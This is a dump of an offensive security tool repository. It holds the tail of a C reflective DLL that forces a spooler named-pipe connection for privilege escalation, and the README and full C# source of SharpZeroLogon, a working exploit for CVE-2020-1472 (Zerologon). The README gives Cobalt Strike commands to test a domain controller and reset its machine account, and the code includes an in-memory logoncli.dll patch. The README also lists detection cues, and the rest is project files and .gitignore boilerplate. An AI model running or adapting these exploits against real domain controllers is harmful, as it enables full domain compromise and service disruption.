        (RPC_WSTR)L"12345678-1234-ABCD-EF00-0123456789AB",
        (RPC_WSTR)L"ncacn_np",
        (RPC_WSTR)lpStr,
        (RPC_WSTR)L"\\pipe\\spoolss",
        NULL,
        &composedBinding);
    if (status != RPC_S_OK)
    {
        return NULL;
    }

    status = RpcBindingFromStringBindingW(composedBinding, &hBinding);

    // The string form is released whether or not the conversion worked.
    RpcStringFreeW(&composedBinding);

    return (status == RPC_S_OK) ? hBinding : NULL;
}
94 |
// Unbind routine paired with STRING_HANDLE_bind: releases the binding handle.
// lpStr is part of the required signature and is not used.
void __RPC_USER STRING_HANDLE_unbind(STRING_HANDLE lpStr, handle_t BindingHandle)
{
    handle_t* pBinding = &BindingHandle;
    RpcBindingFree(pBinding);
}
99 |
// Allocator the MIDL-generated stubs call; forwards to malloc.
void __RPC_FAR* __RPC_USER midl_user_allocate(size_t cBytes)
{
    void __RPC_FAR* pBlock = (void __RPC_FAR*) malloc(cBytes);
    return pBlock;
}
104 |
// Deallocator paired with midl_user_allocate; forwards to free.
void __RPC_USER midl_user_free(void __RPC_FAR* p)
{
    void* pBlock = p;
    free(pBlock);
}
109 |
// DLL entry point. On DLL_PROCESS_ATTACH the argument string comes from one
// of two places:
//   - lpReserved, when it is non-NULL: the narrow string is converted to wide
//     characters, TriggerNamedPipeConnection runs, and the hosting process is
//     terminated with ExitProcess(0);
//   - otherwise the bytes 7 past the start of `patchme` (the length of the
//     "PATCHME" marker that spoolsystem.cna overwrites). If that string is
//     empty nothing happens, and the host process is left running.
// DLL_QUERY_HMODULE is not a standard Windows reason code; presumably it comes
// from ReflectiveLoader.h - confirm.
// Always returns TRUE.
//
// NOTE(review): the calloc results are not checked before use, and pwszParams
// is never freed on the patched-argument path.
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
    BOOL bReturnValue = TRUE;
    LPWSTR pwszParams = NULL;
    size_t convertedChars = 0;
    size_t newsize = 0;
    char* args = NULL;

    switch (dwReason)
    {
    case DLL_QUERY_HMODULE:
        // Hands the module handle back through lpReserved when asked.
        if (lpReserved != NULL)
            *(HMODULE*)lpReserved = hAppInstance;
        break;
    case DLL_PROCESS_ATTACH:
        hAppInstance = hinstDLL;
        if (lpReserved != NULL) {
            // Process arguments
            // Buffer holds strlen + 1 wide characters; newsize is that element count.
            pwszParams = (LPWSTR)calloc(strlen((LPSTR)lpReserved) + 1, sizeof(WCHAR));
            newsize = strlen((LPSTR)lpReserved) + 1;
            mbstowcs_s(&convertedChars, pwszParams, newsize, (LPSTR)lpReserved, _TRUNCATE);
            TriggerNamedPipeConnection(pwszParams);
            // Flush the wprintf output before the process goes away.
            fflush(stdout);
            ExitProcess(0);
        }
        else {
            args = (char*)patchme + 7;
            if (args[0] != '\0') {
                // Load from patched args
                pwszParams = (LPWSTR)calloc(strlen((LPSTR)args) + 1, sizeof(WCHAR));
                newsize = strlen((LPSTR)args) + 1;
                mbstowcs_s(&convertedChars, pwszParams, newsize, (LPSTR)args, _TRUNCATE);
                TriggerNamedPipeConnection(pwszParams);
            }
        }
        break;
    case DLL_PROCESS_DETACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
        break;
    }
    return bReturnValue;
}
153 |
154 |
--------------------------------------------------------------------------------
/Tools/SharpZeroLogon/README.md:
--------------------------------------------------------------------------------
1 | # SharpZeroLogon
2 |
3 | This is an exploit for CVE-2020-1472, a.k.a. Zerologon. This tool exploits a cryptographic vulnerability in Netlogon to achieve authentication bypass. Ultimately, this allows for an attacker to reset the machine account of a target Domain Controller, leading to Domain Admin compromise.
4 |
5 | The vulnerability was discovered by Tom Tervoort of Secura BV, and was addressed by Microsoft on August 11th 2020. You can read more about the vulnerability in [their excellent whitepaper](https://www.secura.com/blog/zero-logon).
6 |
7 | Although other exploits exist, this tool is aimed at working with Cobalt Strike's `execute-assembly` functionality. Therefore it is written in C# using functions from `netapi32.dll`. The nice thing here is that due to the structures being zero by default, we do not need to mess with any packets and can use the APIs provided by Microsoft cleanly (relatively ;).
8 |
9 | # Running
10 |
11 | ## Checking if the server is vulnerable
12 |
13 | To run the exploit, from a domain joined machine (see method below for non domain-joined) run the `SharpZeroLogon.exe` binary, providing the FQDN of the Domain Controller.
14 |
15 | Running it with only one argument will test whether the target Domain Controller is vulnerable to CVE-2020-1472.
16 |
17 | In the following example, the FQDN of the Domain Controller is `win-dc01.vulncorp.local`:
18 |
19 | ```
20 | execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local
21 | ```
22 |
23 | If the Domain Controller is vulnerable, you will receive a message indicating it was Successful, otherwise the server has likely been patched and is not vulnerable.
24 |
25 | ## Resetting the machine account password
26 |
27 | Firstly, it is **very important** to note that resetting the Domain Controller machine account password in this manner **will likely break functionality**. You should not do this on a production system without the system owner understanding that there may be an impact. Of course once you have reset the password, you can then carry out a dcsync (using `pth` with the machine account), and subsequently reset the password using a Domain Admin account via an [official method](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/reset-computermachinepassword?view=powershell-5.1). However, it is important to understand the potential impact in a lab environment before running it blindly.
28 |
29 | To reset the machine account, run the following command (specifying your DC FQDN):
30 |
31 | ```
32 | execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local -reset
33 | ```
34 |
35 | Once the machine account password is reset, you can use `pth` to impersonate the machine account and perform a DCSync.
36 |
37 | ## Testing from a non Domain-joined machine
38 |
39 | By default the `netapi32.dll` functions use RPC over SMB named pipe (ncacn_np), which requires an authenticated session (i.e. a domain-joined client). Benjamin Delpy (@gentilkiwi) found a way round this by patching `logoncli.dll` with a single byte patch that forces RPC over TCP/IP (ncacn_ip_tcp) instead, which he has implemented in Mimikatz. This patch allows the exploit to work from a non domain-joined client as well.
40 |
41 | To run the exploit from a non domain-joined context, use the `-patch` flag, which will force the client to use RPC over TCP/IP.
42 |
43 | For example:
44 |
45 | ```
46 | execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local -patch
47 | ```
48 |
49 | Note that the patch is designed to work on x64 clients only.
50 |
51 | ## Detection
52 |
53 | * A [sample PCAP](https://github.com/sbousseaden/PCAP-ATTACK/blob/master/Lateral%20Movement/CVE-2020-1472_Zerologon_RPC_NetLogon_NullChallenge_SecChan_6_from_nonDC_to_DC.pcapng) of a Zerologon attempt is provided by @sbousseaden.
54 | * Successful exploitation resulting in a password change will show as event ID 4742, Password last set change, performed by Anonymous Logon.
55 | * Adam Swan of SOC Prime provides a [Sigma rule](https://socprime.com/blog/zerologon-attack-detection-cve-2020-1472/) which can be used to detect Zerologon attempts.
56 | * For detecting default `pth` usage in Cobalt Strike, look for command lines containing `/c echo` and `\\.\pipe\` together. Default Cobalt Strike also uses 11 hex characters for the echo argument, and 6 hex characters for the pipe name. Changing these defaults requires manual patching and is not easily configurable by the operator.
57 | * To detect DCSync usage, look for event ID 4662 containing the GUID `{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}`, which is the `DS-Replication-Get-Changes-All` extended right required for replication. Any replication from a non Domain Controller is suspicious. @James_inthe_box also provides [this Snort](https://gist.github.com/silence-is-best/25ae0929c277642e86ecf592598a3254) rule.
58 |
59 | # References
60 | * https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472
61 | * https://www.secura.com/blog/zero-logon
62 | * https://github.com/dirkjanm/CVE-2020-1472
63 | * https://twitter.com/gentilkiwi/status/1305659499991183361
64 | * https://twitter.com/gentilkiwi/status/1305975783781994498
65 | * https://github.com/gentilkiwi/mimikatz/commit/880c15994c4955d232f83cd2f73e5b6b1de165e7
66 |
--------------------------------------------------------------------------------
/Tools/Squeak/Squeak.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {B36CA995-B475-427F-B209-4E7F0835023D}
8 | WinExe
9 | Squeak
10 | Squeak
11 | v4.5
12 | 512
13 | {60dc8134-eba5-43b8-bcc9-bb4bc16c2548};{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}
14 | 4
15 | true
16 | true
17 |
18 |
19 |
20 | AnyCPU
21 | true
22 | full
23 | false
24 | bin\Debug\
25 | DEBUG;TRACE
26 | prompt
27 | 4
28 |
29 |
30 | AnyCPU
31 | pdbonly
32 | true
33 | bin\Release\
34 | TRACE
35 | prompt
36 | 4
37 |
38 |
39 | blacksquare.ico
40 |
41 |
42 |
43 | packages\AurelienRibon.Ui.SyntaxHighlightBox.2.0.2\lib\NET40\AurelienRibon.Ui.SyntaxHighlightBox.dll
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 | 4.0
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 | MSBuild:Compile
63 | Designer
64 |
65 |
66 | Designer
67 | MSBuild:Compile
68 |
69 |
70 | Designer
71 | MSBuild:Compile
72 |
73 |
74 | MSBuild:Compile
75 | Designer
76 |
77 |
78 | App.xaml
79 | Code
80 |
81 |
82 |
83 | Code.xaml
84 |
85 |
86 | Home.xaml
87 |
88 |
89 | MainWindow.xaml
90 | Code
91 |
92 |
93 |
94 |
95 | Code
96 |
97 |
98 | True
99 | True
100 | Resources.resx
101 |
102 |
103 | True
104 | Settings.settings
105 | True
106 |
107 |
108 | ResXFileCodeGenerator
109 | Resources.Designer.cs
110 |
111 |
112 |
113 | SettingsSingleFileGenerator
114 | Settings.Designer.cs
115 |
116 |
117 |
118 |
119 |
120 |
121 |
122 |
123 |
124 |
--------------------------------------------------------------------------------
/Tools/Squeak/Properties/Resources.resx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 | text/microsoft-resx
107 |
108 |
109 | 2.0
110 |
111 |
112 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
113 |
114 |
115 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
--------------------------------------------------------------------------------
/Tools/Sigwhatever/Sigwhatever.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 | Debug
7 | AnyCPU
8 | {311F097D-17BF-418F-BEE7-BE15C1C93FF7}
9 | Exe
10 | Sigwhatever
11 | Sigwhatever
12 | v4.5.1
13 | 512
14 | true
15 | true
16 |
17 |
18 |
19 |
20 |
21 | AnyCPU
22 | true
23 | full
24 | false
25 | bin\Debug\
26 | DEBUG;TRACE
27 | prompt
28 | 4
29 | false
30 |
31 |
32 | AnyCPU
33 | pdbonly
34 | true
35 | bin\Release\
36 | TRACE
37 | prompt
38 | 4
39 | false
40 |
41 |
42 |
43 | packages\Costura.Fody.4.1.0\lib\net40\Costura.dll
44 |
45 |
46 | packages\HtmlAgilityPack.1.11.24\lib\Net45\HtmlAgilityPack.dll
47 |
48 |
49 | packages\Microsoft.Office.Interop.Outlook.15.0.4797.1003\lib\net20\Microsoft.Office.Interop.Outlook.dll
50 | True
51 |
52 |
53 | packages\Microsoft.Office.Interop.Word.15.0.4797.1003\lib\net20\Microsoft.Office.Interop.Word.dll
54 | True
55 |
56 |
57 | packages\NDesk.Options.0.2.1\lib\NDesk.Options.dll
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 | {58FBCF7C-E7A9-467C-80B3-FC65E8FCCA08}
92 | 1
93 | 0
94 | 0
95 | tlbimp
96 | False
97 | True
98 |
99 |
100 |
101 |
102 |
103 |
104 | This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.
105 |
106 |
107 |
108 |
109 |
--------------------------------------------------------------------------------
/Tools/SharpZeroLogon/SharpZeroLogon/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using static SharpZeroLogon.Netapi32;
4 | using static SharpZeroLogon.Kernel32;
5 | using System.Runtime.InteropServices;
6 |
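namespace SharpZeroLogon
{
    /// <summary>
    /// Console proof-of-concept for CVE-2020-1472 (Zerologon). It repeatedly asks a
    /// domain controller for a Netlogon challenge and attempts to authenticate as the
    /// DC's own machine account, reporting whether any attempt is accepted.
    /// The Netlogon and Kernel32 entry points, and the NETLOGON_* / MODULEINFO types,
    /// are declared in Netapi32.cs and Kernel32.cs, which are not part of this listing.
    /// </summary>
    class Program
    {
        /// <summary>
        /// Returns the index of the first occurrence of <paramref name="pattern"/> in
        /// <paramref name="buf"/>, or -1 when there is no match.
        /// </summary>
        /// <param name="buf">Buffer to search.</param>
        /// <param name="pattern">Byte sequence to look for.</param>
        /// <returns>Zero-based offset of the match inside <paramref name="buf"/>, or -1.</returns>
        static int FindPattern(byte[] buf, byte[] pattern)
        {
            // Without this guard an empty pattern throws on pattern[0] and a null
            // argument throws on .Length; treat all of them as "no match".
            if (buf == null || pattern == null || pattern.Length == 0)
                return -1;

            int start = 0;
            // Last position at which the whole pattern still fits inside buf.
            // Negative when the pattern is longer than buf, so the loop is skipped.
            int end = buf.Length - pattern.Length;
            byte firstByte = pattern[0];

            while (start <= end)
            {
                if (buf[start] == firstByte)
                {
                    for (int offset = 1; ; ++offset)
                    {
                        if (offset == pattern.Length)
                        {
                            // Every byte of the pattern matched.
                            return start;
                        }
                        else if (buf[start + offset] != pattern[offset])
                        {
                            break;
                        }
                    }
                }
                ++start;
            }
            return -1;
        }

        /// <summary>
        /// Changes one byte in the copy of logoncli.dll that is mapped into this process.
        /// Nothing in this method writes to the file on disk or to another process.
        /// </summary>
        /// <returns>
        /// true when the byte pattern was found and the byte was rewritten; false when any
        /// Win32 call fails or the pattern is not present in the scanned image.
        /// </returns>
        static bool PatchLogon()
        {
            // Patches logoncli.dll (x64) to use RPC over TCP/IP, making it work from non domain-joined
            // Credit to Benjamin Delpy @gentilkiwi for the neat trick!
            byte[] pattern = { 0xB8, 0x01, 0x00, 0x00, 0x00, 0x83, 0xF8, 0x01, 0x75, 0x3B };

            IntPtr hProc = Process.GetCurrentProcess().Handle;
            MODULEINFO modInfo = new MODULEINFO();
            // The LoadLibrary result is not checked here; a failed load is expected to
            // surface as a failed GetModuleInformation call below.
            IntPtr hModule = LoadLibrary("logoncli.dll");

            if (!GetModuleInformation(hProc, hModule, out modInfo, (uint)Marshal.SizeOf(modInfo)))
                return false;

            // Scan window: [base of the loaded image, base + image size).
            long addr = modInfo.lpBaseOfDll.ToInt64();
            long maxSize = addr + modInfo.SizeOfImage;

            while (addr < maxSize)
            {
                // The image is read and searched in fixed 1024-byte chunks.
                byte[] buf = new byte[1024];
                int bytesRead = 0;
                if (!ReadProcessMemory(hProc, addr, buf, 1024, ref bytesRead))
                    return false;

                int index = FindPattern(buf, pattern);
                if (index > -1)
                {
                    // +1 skips the first pattern byte (0xB8) so the write lands on the byte after it.
                    long patchAddr = addr + index + 1;
                    // 0x04 is PAGE_READWRITE; the previous protection is kept so it can be restored.
                    if (!VirtualProtect(new IntPtr(patchAddr), 1024, 0x04, out uint oldProtect))
                        return false;

                    // patch mov eax 1; => mov eax, 2;
                    Marshal.WriteByte(new IntPtr(patchAddr), 0x02);

                    if (!VirtualProtect(new IntPtr(patchAddr), 1024, oldProtect, out oldProtect))
                        return false;
                    return true;
                }
                addr += 1024;
            }
            return false;
        }

        /// <summary>
        /// Entry point. args[0] is the target DC's fully qualified name; the optional
        /// switches "-patch" and "-reset" may appear anywhere in the argument list.
        /// </summary>
        /// <param name="args">Command-line arguments.</param>
        static void Main(string[] args)
        {
            if (args.Length < 1)
            {
                Console.WriteLine(" Usage: SharpZeroLogon.exe ");
                return;
            }

            bool reset = false;
            bool patch = false;
            string fqdn = args[0];
            // First DNS label of the FQDN is used as the computer name.
            string hostname = fqdn.Split('.')[0];

            // args[0] is also walked here, so a switch given as the first argument
            // is additionally used as the target name.
            foreach (string arg in args)
            {
                switch (arg)
                {
                    case "-reset":
                        reset = true;
                        break;
                    case "-patch":
                        patch = true;
                        break;
                }
            }

            if (patch)
            {
                if (!PatchLogon())
                {
                    Console.WriteLine("Patching failed :(");
                    return;
                }
                Console.WriteLine("Patch successful. Will use ncacn_ip_tcp");
            }

            // Both credentials are default-constructed and never filled in by this code.
            // NOTE(review): presumably that leaves them all-zero; the struct is declared
            // in Netapi32.cs, confirm there.
            NETLOGON_CREDENTIAL ClientChallenge = new NETLOGON_CREDENTIAL();
            NETLOGON_CREDENTIAL ServerChallenge = new NETLOGON_CREDENTIAL();
            ulong NegotiateFlags = 0x212fffff;

            Console.WriteLine("Performing authentication attempts...");

            // Detection note: one run issues up to 2000 challenge/authenticate pairs for
            // the DC's own machine account from a single client. That burst of rejected
            // Netlogon authentications is a practical signal for network and log monitoring.
            for (int i = 0; i < 2000; i++)
            {
                // Any non-zero status aborts the whole run.
                if (I_NetServerReqChallenge(fqdn, hostname, ref ClientChallenge, ref ServerChallenge) != 0)
                {
                    Console.WriteLine("Unable to complete server challenge. Possible invalid name or network issues?");
                    return;
                }
                Console.Write("=");

                // A zero status means the DC accepted the authentication attempt.
                if (I_NetServerAuthenticate2(fqdn, hostname + "$", NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
                    hostname, ref ClientChallenge, ref ServerChallenge, ref NegotiateFlags) == 0)
                {
                    Console.WriteLine("\nSuccess! DC can be fully compromised by a Zerologon attack.");

                    NETLOGON_AUTHENTICATOR authenticator = new NETLOGON_AUTHENTICATOR();
                    NL_TRUST_PASSWORD ClearNewPassword = new NL_TRUST_PASSWORD();

                    if (reset)
                    {
                        // NOTE(review): -reset changes state on the target. The hash printed
                        // below is the NT hash of an empty password. The public write-ups linked
                        // from this project's README describe the machine account as left out
                        // of sync with the DC afterwards; treat this path as destructive and
                        // confirm the restore procedure before it is used in an assessment.
                        if (I_NetServerPasswordSet2(
                            fqdn,
                            hostname + "$",
                            NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
                            hostname,
                            ref authenticator,
                            out _,
                            ref ClearNewPassword
                            ) == 0)
                        {
                            Console.WriteLine("Done! Machine account password set to NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0");
                            return;
                        }
                        Console.WriteLine("Failed to reset machine account password");
                    }

                    return;
                }
            }
            // None of the 2000 attempts was accepted.
            Console.WriteLine("\nAttack failed. Target is probably patched.");
        }
    }
}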
--------------------------------------------------------------------------------
/Tools/Sigwhatever/FodyWeavers.xsd:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 | A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks
13 |
14 |
15 |
16 |
17 | A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks.
18 |
19 |
20 |
21 |
22 | A list of unmanaged 32 bit assembly names to include, delimited with line breaks.
23 |
24 |
25 |
26 |
27 | A list of unmanaged 64 bit assembly names to include, delimited with line breaks.
28 |
29 |
30 |
31 |
32 | The order of preloaded assemblies, delimited with line breaks.
33 |
34 |
35 |
36 |
37 |
38 | This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file.
39 |
40 |
41 |
42 |
43 | Controls if .pdbs for reference assemblies are also embedded.
44 |
45 |
46 |
47 |
48 | Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option.
49 |
50 |
51 |
52 |
53 | As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off.
54 |
55 |
56 |
57 |
58 | Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code.
59 |
60 |
61 |
62 |
63 | Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior.
64 |
65 |
66 |
67 |
68 | A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with |
69 |
70 |
71 |
72 |
73 | A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |.
74 |
75 |
76 |
77 |
78 | A list of unmanaged 32 bit assembly names to include, delimited with |.
79 |
80 |
81 |
82 |
83 | A list of unmanaged 64 bit assembly names to include, delimited with |.
84 |
85 |
86 |
87 |
88 | The order of preloaded assemblies, delimited with |.
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 | 'true' to run assembly verification (PEVerify) on the target assembly after all weavers have been executed.
97 |
98 |
99 |
100 |
101 | A comma-separated list of error codes that can be safely ignored in assembly verification.
102 |
103 |
104 |
105 |
106 | 'false' to turn off automatic generation of the XML Schema file.
107 |
108 |
109 |
110 |
111 |
--------------------------------------------------------------------------------
/Tools/Sigwhatever/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Build results
17 | [Dd]ebug/
18 | [Dd]ebugPublic/
19 | [Rr]elease/
20 | [Rr]eleases/
21 | x64/
22 | x86/
23 | [Aa][Rr][Mm]/
24 | [Aa][Rr][Mm]64/
25 | bld/
26 | [Bb]in/
27 | [Oo]bj/
28 | [Ll]og/
29 |
30 | # Visual Studio 2015/2017 cache/options directory
31 | .vs/
32 | # Uncomment if you have tasks that create the project's static files in wwwroot
33 | #wwwroot/
34 |
35 | # Visual Studio 2017 auto generated files
36 | Generated\ Files/
37 |
38 | # MSTest test Results
39 | [Tt]est[Rr]esult*/
40 | [Bb]uild[Ll]og.*
41 |
42 | # NUNIT
43 | *.VisualState.xml
44 | TestResult.xml
45 |
46 | # Build Results of an ATL Project
47 | [Dd]ebugPS/
48 | [Rr]eleasePS/
49 | dlldata.c
50 |
51 | # Benchmark Results
52 | BenchmarkDotNet.Artifacts/
53 |
54 | # .NET Core
55 | project.lock.json
56 | project.fragment.lock.json
57 | artifacts/
58 |
59 | # StyleCop
60 | StyleCopReport.xml
61 |
62 | # Files built by Visual Studio
63 | *_i.c
64 | *_p.c
65 | *_h.h
66 | *.ilk
67 | *.meta
68 | *.obj
69 | *.iobj
70 | *.pch
71 | *.pdb
72 | *.ipdb
73 | *.pgc
74 | *.pgd
75 | *.rsp
76 | *.sbr
77 | *.tlb
78 | *.tli
79 | *.tlh
80 | *.tmp
81 | *.tmp_proj
82 | *_wpftmp.csproj
83 | *.log
84 | *.vspscc
85 | *.vssscc
86 | .builds
87 | *.pidb
88 | *.svclog
89 | *.scc
90 |
91 | # Chutzpah Test files
92 | _Chutzpah*
93 |
94 | # Visual C++ cache files
95 | ipch/
96 | *.aps
97 | *.ncb
98 | *.opendb
99 | *.opensdf
100 | *.sdf
101 | *.cachefile
102 | *.VC.db
103 | *.VC.VC.opendb
104 |
105 | # Visual Studio profiler
106 | *.psess
107 | *.vsp
108 | *.vspx
109 | *.sap
110 |
111 | # Visual Studio Trace Files
112 | *.e2e
113 |
114 | # TFS 2012 Local Workspace
115 | $tf/
116 |
117 | # Guidance Automation Toolkit
118 | *.gpState
119 |
120 | # ReSharper is a .NET coding add-in
121 | _ReSharper*/
122 | *.[Rr]e[Ss]harper
123 | *.DotSettings.user
124 |
125 | # JustCode is a .NET coding add-in
126 | .JustCode
127 |
128 | # TeamCity is a build add-in
129 | _TeamCity*
130 |
131 | # DotCover is a Code Coverage Tool
132 | *.dotCover
133 |
134 | # AxoCover is a Code Coverage Tool
135 | .axoCover/*
136 | !.axoCover/settings.json
137 |
138 | # Visual Studio code coverage results
139 | *.coverage
140 | *.coveragexml
141 |
142 | # NCrunch
143 | _NCrunch_*
144 | .*crunch*.local.xml
145 | nCrunchTemp_*
146 |
147 | # MightyMoose
148 | *.mm.*
149 | AutoTest.Net/
150 |
151 | # Web workbench (sass)
152 | .sass-cache/
153 |
154 | # Installshield output folder
155 | [Ee]xpress/
156 |
157 | # DocProject is a documentation generator add-in
158 | DocProject/buildhelp/
159 | DocProject/Help/*.HxT
160 | DocProject/Help/*.HxC
161 | DocProject/Help/*.hhc
162 | DocProject/Help/*.hhk
163 | DocProject/Help/*.hhp
164 | DocProject/Help/Html2
165 | DocProject/Help/html
166 |
167 | # Click-Once directory
168 | publish/
169 |
170 | # Publish Web Output
171 | *.[Pp]ublish.xml
172 | *.azurePubxml
173 | # Note: Comment the next line if you want to checkin your web deploy settings,
174 | # but database connection strings (with potential passwords) will be unencrypted
175 | *.pubxml
176 | *.publishproj
177 |
178 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
179 | # checkin your Azure Web App publish settings, but sensitive information contained
180 | # in these scripts will be unencrypted
181 | PublishScripts/
182 |
183 | # NuGet Packages
184 | *.nupkg
185 | # The packages folder can be ignored because of Package Restore
186 | **/[Pp]ackages/*
187 | # except build/, which is used as an MSBuild target.
188 | !**/[Pp]ackages/build/
189 | # Uncomment if necessary however generally it will be regenerated when needed
190 | #!**/[Pp]ackages/repositories.config
191 | # NuGet v3's project.json files produces more ignorable files
192 | *.nuget.props
193 | *.nuget.targets
194 |
195 | # Microsoft Azure Build Output
196 | csx/
197 | *.build.csdef
198 |
199 | # Microsoft Azure Emulator
200 | ecf/
201 | rcf/
202 |
203 | # Windows Store app package directories and files
204 | AppPackages/
205 | BundleArtifacts/
206 | Package.StoreAssociation.xml
207 | _pkginfo.txt
208 | *.appx
209 |
210 | # Visual Studio cache files
211 | # files ending in .cache can be ignored
212 | *.[Cc]ache
213 | # but keep track of directories ending in .cache
214 | !?*.[Cc]ache/
215 |
216 | # Others
217 | ClientBin/
218 | ~$*
219 | *~
220 | *.dbmdl
221 | *.dbproj.schemaview
222 | *.jfm
223 | *.pfx
224 | *.publishsettings
225 | orleans.codegen.cs
226 |
227 | # Including strong name files can present a security risk
228 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
229 | #*.snk
230 |
231 | # Since there are multiple workflows, uncomment next line to ignore bower_components
232 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
233 | #bower_components/
234 |
235 | # RIA/Silverlight projects
236 | Generated_Code/
237 |
238 | # Backup & report files from converting an old project file
239 | # to a newer Visual Studio version. Backup files are not needed,
240 | # because we have git ;-)
241 | _UpgradeReport_Files/
242 | Backup*/
243 | UpgradeLog*.XML
244 | UpgradeLog*.htm
245 | ServiceFabricBackup/
246 | *.rptproj.bak
247 |
248 | # SQL Server files
249 | *.mdf
250 | *.ldf
251 | *.ndf
252 |
253 | # Business Intelligence projects
254 | *.rdl.data
255 | *.bim.layout
256 | *.bim_*.settings
257 | *.rptproj.rsuser
258 | *- Backup*.rdl
259 |
260 | # Microsoft Fakes
261 | FakesAssemblies/
262 |
263 | # GhostDoc plugin setting file
264 | *.GhostDoc.xml
265 |
266 | # Node.js Tools for Visual Studio
267 | .ntvs_analysis.dat
268 | node_modules/
269 |
270 | # Visual Studio 6 build log
271 | *.plg
272 |
273 | # Visual Studio 6 workspace options file
274 | *.opt
275 |
276 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
277 | *.vbw
278 |
279 | # Visual Studio LightSwitch build output
280 | **/*.HTMLClient/GeneratedArtifacts
281 | **/*.DesktopClient/GeneratedArtifacts
282 | **/*.DesktopClient/ModelManifest.xml
283 | **/*.Server/GeneratedArtifacts
284 | **/*.Server/ModelManifest.xml
285 | _Pvt_Extensions
286 |
287 | # Paket dependency manager
288 | .paket/paket.exe
289 | paket-files/
290 |
291 | # FAKE - F# Make
292 | .fake/
293 |
294 | # JetBrains Rider
295 | .idea/
296 | *.sln.iml
297 |
298 | # CodeRush personal settings
299 | .cr/personal
300 |
301 | # Python Tools for Visual Studio (PTVS)
302 | __pycache__/
303 | *.pyc
304 |
305 | # Cake - Uncomment if you are using it
306 | # tools/**
307 | # !tools/packages.config
308 |
309 | # Tabs Studio
310 | *.tss
311 |
312 | # Telerik's JustMock configuration file
313 | *.jmconfig
314 |
315 | # BizTalk build output
316 | *.btp.cs
317 | *.btm.cs
318 | *.odx.cs
319 | *.xsd.cs
320 |
321 | # OpenCover UI analysis results
322 | OpenCover/
323 |
324 | # Azure Stream Analytics local run output
325 | ASALocalRun/
326 |
327 | # MSBuild Binary and Structured Log
328 | *.binlog
329 |
330 | # NVidia Nsight GPU debugger configuration file
331 | *.nvuser
332 |
333 | # MFractors (Xamarin productivity tool) working folder
334 | .mfractor/
335 |
336 | # Local History for Visual Studio
337 | .localhistory/
338 |
339 | # BeatPulse healthcheck temp database
340 | healthchecksdb
--------------------------------------------------------------------------------
/Tools/bof-vs-template/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Build results
17 | [Dd]ebug/
18 | [Dd]ebugPublic/
19 | [Rr]elease/
20 | [Rr]eleases/
21 | x64/
22 | x86/
23 | [Aa][Rr][Mm]/
